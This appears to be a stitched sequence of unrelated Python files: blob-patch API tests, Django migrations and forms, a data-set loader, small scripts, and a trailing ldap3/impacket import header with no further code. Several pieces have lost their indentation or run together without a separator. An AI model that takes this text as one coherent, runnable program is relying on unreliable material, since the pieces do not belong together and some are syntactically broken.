checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch,[zauth,Constants.USER_BLOB,"%s/out.zcdiff"%diff_path,cas_invalid,checksum ],[409])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_miss_CAS(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas = 0
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
checksum = diff_data_post(diff_path,oldFile,newFile)
cas_miss = ''
ret, result = self.check_pass(user_blob_patch, [zauth,Constants.USER_BLOB,"%s/out.zcdiff"%diff_path,cas_miss,checksum ],[409])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_corrupted_diff(self):
#ZID = random.randint(1,9999)
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas = 0
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
corruptFile = diff_path + '/out.zcdiff'
f = open(corruptFile,'r+')
f.seek(-10,2)
f.write(os.urandom(5)) #Edit the zcdiff file by adding some random data to corrupt it.
f.close()
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[500])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_corrupted_checksum(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas = 0
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
corrupted_checksum = checksum + '23487HIH&*(' #corrupt the checksum by adding some random string
ret,result = self.check_pass(user_blob_patch,[zauth,Constants.USER_BLOB,"%s/out.zcdiff"%diff_path,cas,corrupted_checksum ],[500])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_without_base(self):
ZID = random.randint(1,9999) #Do not take zid from api_constants for this test, as it requires a new zid alltogether
zauth = AuthSystem.getUntrustedToken(ZID)
result = user_blob_get( zauth )
if "'CAS': None" in str(result):
cas = 0
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = '' #the old blob can be taken as empty string as there is no existence of old blob in the first place
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
checksum = diff_data_post(diff_path,oldFile,newFile)
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[500])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_without_checksum(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
checksum = None
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[500])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_Admin_Token(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
zauth = AuthSystem.getTrustedAuthToken(Constants.ZID) #Trusted auth token is Admin token
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[0])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_ReadOnly_Token(self):
zauth = AuthSystem.getUntrustedToken(Constants.ZID)
result = user_blob_get(zauth)
if "'CAS': None" in str(result):
cas=" "
else:
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
data = data_to_post()
ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
oldFile = diff_path + '/old.txt'
f = open(oldFile,'wb+')
f.write(data)
f.close()
result = user_blob_get(zauth)
newFile = diff_path + '/new.txt'
f = open(newFile,'wb+')
f.write(os.urandom(100))
f.close()
cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
checksum = diff_data_post(diff_path,oldFile,newFile)
zauth = AuthSystem.getReadonlyToken(Constants.ZID) #Read only token
ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff"%diff_path, cas,checksum ],[403])
self.assertTrue(ret, msg='Failed to send API request')
os.system('rm %s/out.zcdiff'%diff_path)
def test_user_blob_patch_Impersonated_Token(self):
    """Patch the user blob with an impersonated token; expect success (code 0)."""
    zauth = AuthSystem.getUntrustedToken(Constants.ZID)
    result = user_blob_get(zauth)
    # A fresh blob has no CAS yet; fall back to a blank CAS for the first write.
    if "'CAS': None" in str(result):
        cas = " "
    else:
        cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
    data = data_to_post()
    ret, result = self.check_pass(user_blob_set, [ zauth, Constants.USER_BLOB, data, cas ],[0])
    # Write the uploaded payload and a random replacement, then build a diff.
    oldFile = diff_path + '/old.txt'
    with open(oldFile, 'wb+') as f:
        f.write(data)
    result = user_blob_get(zauth)
    newFile = diff_path + '/new.txt'
    with open(newFile, 'wb+') as f:
        f.write(os.urandom(100))
    cas = result[ Constants.BLOBS ][ Constants.USER_BLOB ][ Constants.GH_CAS ]
    checksum = diff_data_post(diff_path, oldFile, newFile)
    zauth = AuthSystem.getImpersonatedAuthToken(Constants.ZID)  # Impersonated token
    ret, result = self.check_pass(user_blob_patch, [ zauth, Constants.USER_BLOB, "%s/out.zcdiff" % diff_path, cas, checksum ],[0])
    self.assertTrue(ret, msg='Failed to send API request')
    # os.remove is portable and explicit, unlike shelling out to 'rm'.
    if os.path.exists('%s/out.zcdiff' % diff_path):
        os.remove('%s/out.zcdiff' % diff_path)
if __name__ == '__main__':
    # Legacy plain-unittest runner kept for reference:
    #suite0 = unittest.TestLoader().loadTestsFromTestCase(blob_diff)
    #unittest.TextTestRunner(verbosity=99).run(suite0)
    # testoob (third-party runner) renders the suite results as an HTML report.
    import testoob
    from testoob.reporting import HTMLReporter
    testoob.main(html='/opt/zynga/greyhound/current/gh_test/scripts/test/results/blob_delta.html')
|
# Generated by Django 2.2.11 on 2020-03-19 06:34
import django.core.validators
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial auto-generated schema for the facility app.

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Core Facility record; capacities are constrained to be non-negative.
        migrations.CreateModel(
            name="Facility",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created_date", models.DateTimeField(auto_now_add=True)),
                ("modified_date", models.DateTimeField(auto_now=True)),
                ("name", models.CharField(max_length=1000)),
                ("is_active", models.BooleanField(default=True)),
                (
                    "bed_capacity",
                    models.IntegerField(
                        default=0,
                        validators=[django.core.validators.MinValueValidator(0)],
                    ),
                ),
                (
                    "icu_capacity",
                    models.IntegerField(
                        default=0,
                        validators=[django.core.validators.MinValueValidator(0)],
                    ),
                ),
            ],
            options={
                "abstract": False,
            },
        ),
        # Location record keyed by an integer district code (Kerala districts).
        migrations.CreateModel(
            name="FacilityLocation",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created_date", models.DateTimeField(auto_now_add=True)),
                ("modified_date", models.DateTimeField(auto_now=True)),
                (
                    "district",
                    models.IntegerField(
                        choices=[
                            (1, "Thiruvananthapuram"),
                            (2, "Kollam"),
                            (3, "Pathanamthitta"),
                            (4, "Alappuzha"),
                            (5, "Kottayam"),
                            (6, "Idukki"),
                            (7, "Ernakulam"),
                            (8, "Thrissur"),
                            (9, "Palakkad"),
                            (10, "Malappuram"),
                            (11, "Kozhikode"),
                            (12, "Wayanad"),
                            (13, "Kannur"),
                            (14, "Kasaragod"),
                        ]
                    ),
                ),
            ],
            options={
                "abstract": False,
            },
        ),
        # Link table: volunteers (users) attached to a facility.
        migrations.CreateModel(
            name="FacilityVolunteer",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created_date", models.DateTimeField(auto_now_add=True)),
                ("modified_date", models.DateTimeField(auto_now=True)),
                (
                    "facility",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to="facility.Facility",
                    ),
                ),
                (
                    "volunteer",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
            options={
                "abstract": False,
            },
        ),
        # Link table: staff (users) attached to a facility.
        migrations.CreateModel(
            name="FacilityStaff",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created_date", models.DateTimeField(auto_now_add=True)),
                ("modified_date", models.DateTimeField(auto_now=True)),
                (
                    "facility",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to="facility.Facility",
                    ),
                ),
                (
                    "staff",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
            options={
                "abstract": False,
            },
        ),
    ]
|
import io_utils
import numpy as np
import pandas as pd
import shutil
class DataSets:
    """Registry and loaders for the benchmark data sets.

    Each entry of ``data_sets`` maps a name to a (data_info, labels_info)
    pair understood by ``__load_data_set_file``:
      - path:            file path relative to ``root_dir``
      - method:          io_utils loader name (default: 'regular_matrix')
      - args / kwargs:   extra loader arguments
      - apply_transform: callable applied to the loaded array
      - feat_labels:     path of the +1/-1 feature-label file (real vs probe)
    """
    root_dir = ".."
    data_sets = {
        'colon': (
            {
                "path": "/COLON/COLON/colon.data",
            },
            {
                "path": "/COLON/COLON/colon.labels",
                "apply_transform": np.sign
            }
        ),
        'arcene': (
            {
                "path": "/ARCENE/ARCENE/arcene.data",
                "apply_transform": np.transpose,
                "feat_labels": "/ARCENE/ARCENE/arcene_feat.labels"
            },
            {
                'path': "/ARCENE/ARCENE/arcene.labels",
            }
        ),
        'dexter': (
            {
                "feat_labels": "/DEXTER/DEXTER/dexter_feat.labels",
                "path": "/DEXTER/DEXTER/dexter.data",
                "method": "sparse_matrix",
                "args": [20000]
            },
            {
                "path": "/DEXTER/DEXTER/dexter.labels",
            }
        ),
        "dorothea": (
            {
                "feat_labels": "/DOROTHEA/DOROTHEA/dorothea_feat.labels",
                "path": "/DOROTHEA/DOROTHEA/dorothea.data",
                "method": "sparse_binary_matrix",
                "args": [100001],
                "apply_transform": lambda x: x[:, :150]
            },
            {
                "path": "/DOROTHEA/DOROTHEA/dorothea.labels",
                "apply_transform": lambda x: x[:150]
            }
        ),
        "gisette": (
            {
                "feat_labels": "/GISETTE/GISETTE/gisette_feat.labels",
                "path": "/GISETTE/GISETTE/gisette_valid.data",
                "apply_transform": lambda x: np.transpose(x)[:, :200],
            },
            {
                "path": "/GISETTE/GISETTE/gisette_valid.labels",
                "apply_transform": lambda x: x[:200]
            }
        ),
        "artificial": (
            {
                "feat_labels": "/ARTIFICIAL/ARTIFICIAL/artificial_feat.labels",
                "path": "/ARTIFICIAL/ARTIFICIAL/artificial.data.npy",
                "method": "numpy_matrix",
            },
            {
                "path": "/ARTIFICIAL/ARTIFICIAL/artificial.labels.npy",
                "method": "numpy_matrix",
            }
        )
    }

    @staticmethod
    def save_artificial(data, labels, feature_labels):
        """Persist a generated artificial data set and invalidate its cache."""
        PreComputedData.delete("artificial")
        artificial_data_dir = DataSets.root_dir + "/ARTIFICIAL/ARTIFICIAL"
        io_utils.mkdir(artificial_data_dir)
        data_file_name = artificial_data_dir + "/artificial.data"
        label_file_name = artificial_data_dir + "/artificial.labels"
        feature_label_file_name = artificial_data_dir + "/artificial_feat.labels"
        np.save(data_file_name, data)
        np.save(label_file_name, labels)
        np.savetxt(feature_label_file_name, feature_labels, fmt='%d')

    @staticmethod
    def load(data_set):
        """Return (data, labels); real features are stacked before probes."""
        data_info, labels_info = DataSets.data_sets[data_set]
        labels = DataSets.__load_data_set_file(labels_info)
        data = DataSets.__load_data_set_file(data_info)
        feature_labels = DataSets.load_features_labels(data_set)
        if feature_labels is not None:
            # BUG FIX: data[[mask]] wrapped the boolean mask in a list, which
            # numpy deprecated and newer versions reject; index with the mask
            # directly.
            features = data[feature_labels == 1]
            probes = data[feature_labels == -1]
            data = np.vstack((features, probes))
        return data, labels

    @staticmethod
    def __load_data_set_file(info):
        """Dispatch to the io_utils loader named by the descriptor."""
        data = getattr(io_utils, info.get('method', 'regular_matrix'))(
            DataSets.root_dir + info['path'],
            *info.get('args', []),
            **info.get('kwargs', {})
        )
        apply_transform = info.get('apply_transform', False)
        if apply_transform:
            return apply_transform(data)
        return data

    @staticmethod
    def load_features_labels(data_set):
        """Return the +1/-1 feature-label vector, or None if not available."""
        if data_set not in DataSets.data_sets:
            return None
        data_info, _ = DataSets.data_sets[data_set]
        feat_labels_filename = data_info.get('feat_labels', None)
        if feat_labels_filename is not None:
            return np.loadtxt(DataSets.root_dir + feat_labels_filename)
        return None
class PreComputedData:
    """Filesystem layout and loading helpers for cached per-dataset results.

    Layout: <DataSets.root_dir>/pre_computed_data/<data_set>/<CVClass>/...
    """

    @staticmethod
    def load(data_set, cv, assessment_method, feature_selector):
        """Load the cached array for one feature selector; re-raise if missing."""
        path = PreComputedData.file_name(data_set, cv, assessment_method, feature_selector)
        try:
            return np.load(path)
        except FileNotFoundError:
            print("File " + path + " not found")
            raise

    @staticmethod
    def file_name(data_set, cv, assessment_method, feature_selector):
        """Full path of the .npy file for a given feature selector."""
        base = PreComputedData.dir_name(data_set, cv, assessment_method)
        return base + "/" + feature_selector.__name__ + ".npy"

    @staticmethod
    def load_cv(data_set, cv):
        """Load the cached cross-validation indices; re-raise if missing."""
        path = PreComputedData.cv_file_name(data_set, cv)
        try:
            return np.load(path)
        except FileNotFoundError:
            print("CV {} was never generated".format(type(cv).__name__))
            raise

    @staticmethod
    def delete(data_set):
        """Remove every cached artifact of *data_set* (no-op when absent)."""
        try:
            shutil.rmtree(PreComputedData.root_dir(data_set))
        except FileNotFoundError:
            pass

    @staticmethod
    def cv_file_name(data_set, cv):
        """Path of the stored CV indices file."""
        return "{}/indices.npy".format(PreComputedData.cv_dir(data_set, cv))

    @staticmethod
    def dir_name(data_set, cv, assessment_method):
        """Directory for one (CV, assessment method) combination."""
        return "{}/{}".format(PreComputedData.cv_dir(data_set, cv), assessment_method)

    @staticmethod
    def cv_dir(data_set, cv):
        """Directory for one CV strategy, keyed by the CV class name."""
        return "{}/{}".format(PreComputedData.root_dir(data_set), type(cv).__name__)

    @staticmethod
    def root_dir(data_set):
        """Root cache directory of one data set."""
        return "{}/pre_computed_data/{}".format(DataSets.root_dir, data_set)
class Analysis:
    """Loading helpers for per-selector analysis CSVs."""

    @staticmethod
    def load_csv(data_set, cv, assessment_method, feature_method):
        # Read the stats CSV for one feature-selection method; re-raise if absent.
        filename = Analysis.file_name(data_set, cv, assessment_method, feature_method) + ".csv"
        try:
            stats = pd.read_csv(filename)
            return stats
        except FileNotFoundError:
            print("File " + filename + " not found")
            raise

    @staticmethod
    def file_name(data_set, cv, assessment_method, feature_method):
        # Base file name (no extension) for the method's analysis output.
        return Analysis.dir_name(data_set, cv, assessment_method) + "/" + feature_method.__name__

    @staticmethod
    def dir_name(data_set, cv, method):
        # NOTE(review): `method` is passed to format() but the template never
        # references {method}, so every assessment method resolves to the same
        # directory — confirm whether ".../{cv}/{method}" was intended
        # (PreComputedData.dir_name does append the method segment).
        return "{root_dir}/pre_computed_data/{data_set}/{cv}".format(
            root_dir=DataSets.root_dir,
            method=method,
            data_set=data_set,
            cv=type(cv).__name__
        )
|
def main(msg):
    """Print *msg* to stdout."""
    print(msg)


#Added a comment for pi2
# add a comment for pi3
# a second comment for pi3
if __name__ == '__main__':
    # Guarded so importing this module no longer triggers the demo print.
    main('hello world!!!')
|
# Python 2 exploratory script: call the WSL-hosted `opencfu` tool from
# Windows Python via subprocess, working around WoW64 System32 redirection.
import subprocess, os, sys
print os.name
if os.name == 'nt':
    print 'so windows'
if os.name == "nt":
    #out = subprocess.check_output(["arp", "-a"])
    #out = subprocess.check_output("dir", shell=True)
    pass
    print 'past here'
else:
    out = subprocess.check_output(["ls", "-l"])
    #print out
#These do no work as WoW64 can not find wsl in System32
#out = subprocess.check_output(["wsl", "opencfu", "-i", "data/samples/blah.jpg"], shell=True)
#out = subprocess.check_output(["wsl", "opencfu", "-i", "data/samples/blah.jpg"])
#This works when calling from windows >wsl python demo-subproc.py
#out = subprocess.check_output(["opencfu", "-i", "data/samples/blah.jpg"])
#This works from windows calling windows python >python demo-subproc.py
# SysNative bypasses WoW64 filesystem redirection for 32-bit processes.
wsl_path = "c:/windows/SysNative/wsl.exe"
out = subprocess.check_output([wsl_path, "opencfu", "-i", "data/samples/blah.jpg"])
#Also we do have pipe
# NOTE(review): without shell=True the ">" and file name below are passed to
# wsl as literal argv entries, not interpreted as a shell redirect — confirm
# whether the redirect actually happens (wsl may hand them to a shell).
cmd = [wsl_path, "opencfu", "-i", "data/samples/blah.jpg"]
cmd.extend([">", "aaa-pipe.txt"])
out = subprocess.check_output(cmd)
if os.name == "nt":
    out = subprocess.check_output("dir", shell=True)
    print 'direcctory contents should contains aaa-pipe.txt'
    print out
    print 'len: ', str(len(out))
    print 'len 0: ', str(len(out[0]))
    print '0: ', str(out[0])
    print out[95:98]
    print len(out.split("\n"))
#print out
#maybe system attributes on .jpg?
#maybe do [windows]-python call subproc("wsl" "python" "subproc-shell.py")
#-> subproc("opencfu" "-i" "img") [subproc-shell.py]
#OK so python
#https://stackoverflow.com/questions/39812882/python-subprocess-call-cannot-find-windows-bash-exe
#how to first call anything with wsl?
#Explicit_PATH_to_WSL
#c:/windows/system32/wsl.exe
#Explicit_FULL_PATH_to_data
#C:\Python27\python.exe
# Generated by Django 2.2.4 on 2020-05-07 10:35
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration altering EmailVerifyRecord.send_time's default.

    dependencies = [
        ('user', '0014_auto_20200507_2028'),
    ]

    operations = [
        migrations.AlterField(
            model_name='emailverifyrecord',
            name='send_time',
            # NOTE(review): the default is the *fixed* timestamp captured when
            # makemigrations ran (2020-05-07 20:35), so rows created later all
            # default to this constant — confirm the model should not use
            # `default=datetime.datetime.now` (callable) or `auto_now_add=True`.
            field=models.DateTimeField(default=datetime.datetime(2020, 5, 7, 20, 35, 0, 3747), verbose_name='sendTime'),
        ),
    ]
|
"""
Имя проекта: practicum_1
Номер версии: 1.0
Имя файла: 23.py
Автор: 2020 © Ю.А. Мазкова, Челябинск
Лицензия использования: CC BY-NC 4.0 (https://creativecommons.org/licenses/by-nc/4.0/deed.ru)
Дата создания: 10/12/2020
Дата последней модификации: 10/12/2020
Связанные файлы/пакеты: numpy, random
Описание: Решение задач № 1-101 практикума № 1
Даны вещественные числа X и Y . Вычислить Z. Z = √(X x Y) при X > Y, Z = ln(X + Y ) в противном случае.
#версия Python: 3.9.0
"""
import math
x = float(input("Введите вещественное число x:"))
y = float(input("Введите вещественное число y:"))
if x > y:
z = math.sqrt(x * y)
print(z)
else:
z = math.log(x + y, math.e)
print(z)
|
from django import forms
from apps.constructora.models import *
import datetime
def validarFecha(date):
    """Return *date* formatted as ISO 'YYYY-MM-DD' for HTML date inputs.

    BUG FIX: the previous manual concatenation zero-padded the month but
    not the day, producing invalid values such as '2020-03-5' for
    single-digit days; strftime pads both.
    """
    return date.strftime("%Y-%m-%d")


# Today's date, used as the minimum selectable construction start date.
fecha = validarFecha(datetime.datetime.now())
class ProyectoForm(forms.ModelForm):
    """Create/edit form for Proyecto; the start date cannot precede today."""
    class Meta:
        model=Proyecto
        fields=[
            'idCliente',
            'nombreProyecto',
            'descripcionProyecto',
            'ubicacion',
            'fechaInicioConstruccion',
        ]
        labels={
            'idCliente':'Elija un Cliente',
            'nombreProyecto':'Nombre del Proyecto',
            'descripcionProyecto':'Descripción',
            'ubicacion':'Dirección',
            'fechaInicioConstruccion':'Fecha que iniciará',
        }
        widgets={
            'idCliente':forms.Select(attrs={'class':'form-control'}),
            'nombreProyecto':forms.TextInput(attrs={'class':'form-control'}),
            'descripcionProyecto':forms.Textarea(attrs={'class':'form-control','rows':2}),
            'ubicacion':forms.Textarea(attrs={'class':'form-control','rows':2}),
            # 'min' uses the module-level `fecha`, computed once at import time.
            'fechaInicioConstruccion': forms.TextInput(attrs={'class':'form-control','type':'date', 'min':fecha}),
        }


class RecursoForm(forms.ModelForm):
    """Create form for Recurso records."""
    class Meta:
        model = Recurso
        fields = [
            'codigoRecurso',
            'nombreRecurso',
            'tipoRecurso',
            'descripcionRecurso',
        ]
        labels = {
            'codigoRecurso' : 'Código',
            'nombreRecurso' : 'Nombre',
            'tipoRecurso' : 'Tipo de Recurso',
            'descripcionRecurso': 'Descripcion',
        }
        widgets = {
            'codigoRecurso' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Código del Recurso'}),
            'nombreRecurso' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Nombre del Recurso'}),
            'tipoRecurso' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Tipo de Recurso'}),
            'descripcionRecurso' : forms.Textarea(attrs={'rows':5, 'class':'form-control','placeholder':'Escriba la descripción del Recurso'}),
        }


class RecursoForm_2(forms.ModelForm):
    """Edit form for Recurso; identical to RecursoForm except the code field is read-only."""
    class Meta:
        model = Recurso
        fields = [
            'codigoRecurso',
            'nombreRecurso',
            'tipoRecurso',
            'descripcionRecurso',
        ]
        labels = {
            'codigoRecurso' : 'Código',
            'nombreRecurso' : 'Nombre',
            'tipoRecurso' : 'Tipo de Recurso',
            'descripcionRecurso': 'Descripcion',
        }
        widgets = {
            'codigoRecurso' : forms.TextInput(attrs={'class':'form-control','readonly':'readonly','placeholder':'Escriba el Código del Recurso'}),
            'nombreRecurso' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Nombre del Recurso'}),
            'tipoRecurso' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Tipo de Recurso'}),
            'descripcionRecurso' : forms.Textarea(attrs={'rows':5, 'class':'form-control','placeholder':'Escriba la descripción del Recurso'}),
        }


class EjemplarForm(forms.ModelForm):
    """Create/edit form for Ejemplar records."""
    class Meta:
        model = Ejemplar
        fields = [
            'codigoEjemplar',
            'nombreEjemplar',
            'descripcionEjemplar',
        ]
        labels = {
            'codigoEjemplar' : 'Código',
            'nombreEjemplar' : 'Nombre',
            'descripcionEjemplar': 'Descripcion',
        }
        widgets = {
            'codigoEjemplar' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Código del Ejemplar'}),
            'nombreEjemplar' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Nombre del Ejemplar'}),
            'descripcionEjemplar' : forms.Textarea(attrs={'rows':3, 'class':'form-control','placeholder':'Escriba la descripción del Ejemplar'}),
        }


class HerramientaForm(forms.ModelForm):
    """Create/edit form for Herramienta; quantity is constrained to >= 0 in the widget."""
    class Meta:
        model = Herramienta
        fields = [
            'codigoHerramienta',
            'nombreHerramienta',
            'cantidadHerramienta',
            'descripcionHerramienta',
        ]
        labels = {
            'codigoHerramienta' : 'Código',
            'nombreHerramienta' : 'Nombre',
            'cantidadHerramienta' : 'Cantidad de herramientas',
            'descripcionHerramienta' : 'Descripcion',
        }
        widgets = {
            'codigoHerramienta' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Código de la Herramienta'}),
            'nombreHerramienta' : forms.TextInput(attrs={'class':'form-control','placeholder':'Escriba el Nombre de la Herramienta'}),
            'cantidadHerramienta' : forms.NumberInput(attrs={'class':'form-control','placeholder':'Escriba el numero de Herramientas','min':'0'}),
            'descripcionHerramienta' : forms.Textarea(attrs={'rows':3, 'class':'form-control','placeholder':'Escriba la descripción de la Herramienta'}),
        }


class EmpleadoForm(forms.ModelForm):
    """Create/edit form for Empleado (personal and ID-document fields)."""
    class Meta:
        model=Empleado
        fields=[
            'nombres',
            'apellidos',
            'direccion',
            'numTelefono',
            'dui',
            'nit',
            'isss',
        ]
        labels={
            'nombres':'Nombre: ',
            'apellidos':'Apellido: ',
            'direccion':'Direccion: ',
            'numTelefono':'Telefono: ',
            'dui':'Dui: ',
            'nit':'Nit: ',
            'isss':'Isss: ',
        }
        widgets={
            'nombres':forms.TextInput(attrs={'class':'form-control'}),
            'apellidos':forms.TextInput(attrs={'class':'form-control'}),
            'direccion':forms.TextInput(attrs={'class':'form-control'}),
            'numTelefono':forms.TextInput(attrs={'class':'form-control'}),
            'dui':forms.TextInput(attrs={'class':'form-control'}),
            'nit':forms.TextInput(attrs={'class':'form-control'}),
            'isss':forms.TextInput(attrs={'class':'form-control'}),
        }


class clienteForm(forms.ModelForm):
    """Create/edit form for Cliente records."""
    class Meta:
        model=Cliente
        fields=[
            'nombreCliente',
            'direccion',
            'email',
            'nit',
            'giro',
            'numTelefono',
        ]
        labels={
            'nombreCliente':'Nombre completo',
            'direccion':'Direccion',
            'email': 'Email',
            'nit': 'Nit',
            'giro': 'Giro',
            'numTelefono':'Telefono',
        }
        widgets={
            'nombreCliente':forms.TextInput(attrs={'class':'form-control'}),
            'direccion':forms.TextInput(attrs={'class':'form-control'}),
            'email':forms.TextInput(attrs={'class':'form-control'}),
            'nit':forms.TextInput(attrs={'class':'form-control'}),
            'giro':forms.TextInput(attrs={'class':'form-control'}),
            'numTelefono':forms.TextInput(attrs={'class':'form-control'}),
        }


class ContratoForm(forms.ModelForm):
    """Create/edit form for Contrato records."""
    class Meta:
        model=Contrato
        fields=[
            'descripcion',
            'periodoContrato',
        ]
        labels={
            'descripcion':'Descripción: ',
            'periodoContrato':'Periodo de contrato: ',
        }
        widgets={
            'descripcion':forms.Textarea(attrs={'class':'form-control','rows':2}),
            'periodoContrato':forms.TextInput(attrs={'class':'form-control'}),
        }


class puestoForm(forms.ModelForm):
    """Create/edit form for Puesto records."""
    class Meta:
        model=Puesto
        fields=[
            'nombrePuesto',
            'descripcionPuesto',
        ]
        labels={
            'nombrePuesto':'Nombre de puesto: ',
            'descripcionPuesto':'Descripcion de puesto: ',
        }
        widgets={
            'nombrePuesto':forms.TextInput(attrs={'class':'form-control'}),
            'descripcionPuesto':forms.Textarea(attrs={'class':'form-control','rows':2}),
        }
#!/usr/bin/env python3
from ldap3 import ALL, Server, Connection, MODIFY_REPLACE, NTLM, MODIFY_DELETE, SASL, KERBEROS
from binascii import unhexlify
from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR
